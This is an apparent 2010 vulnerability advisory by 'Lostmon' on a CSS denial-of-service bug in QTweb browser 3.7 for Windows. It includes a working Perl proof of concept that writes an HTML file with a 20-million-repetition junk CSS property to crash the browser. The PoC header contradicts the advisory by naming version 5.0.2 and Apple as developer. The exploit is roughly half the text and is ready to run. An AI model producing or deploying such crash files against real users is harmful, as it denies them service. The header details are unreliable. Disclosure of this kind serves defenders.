#########################################################
QTweb browser for windows 3.7(Build 063) CSS Denial of Service
Vendor URL: http://www.qtweb.net/
Advisore:http://lostmon.blogspot.com/2010/12/qtweb-browser-for-windows-37build-063.html
Vendor notify: NO exploit available: YES
##########################################################
QTweb browser for windows is prone vulnerable to a denial of service
condition. An attacker can exploit this issue to cause the
affected browser to crash, effectively denying service to
legitimate users.
The following are vulnerable:
QTweb for windows 3.7(Build 063)
###########
Sample PoC
###########
Generate the Crash file and open it with QTweb browser,it hangs and arround one minut it crash with a anormal program termination.
#########################################################################
# Title: QTweb browser for windows 5.0.2(7533.18.5) CSS Denial of Service PoC
# Developer: http://www.Apple.com
# Tested: Windows 7 Ultimate 32-bit
#########################################################################
#
#!/usr/bin/perl
my $file= "Crash_QTweb.html";
my $junk= "A/" x 20000016;
open($FILE,">$file");
print $FILE "<html>\n<head>\n<style type='text/css'>\nbody {shitCSS: ".$junk."}\n</style>\n</head>\n</html>";
print "\nCrash_QTweb.html File Created successfully\n";
close($FILE);
############################# EOF ############################
Atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....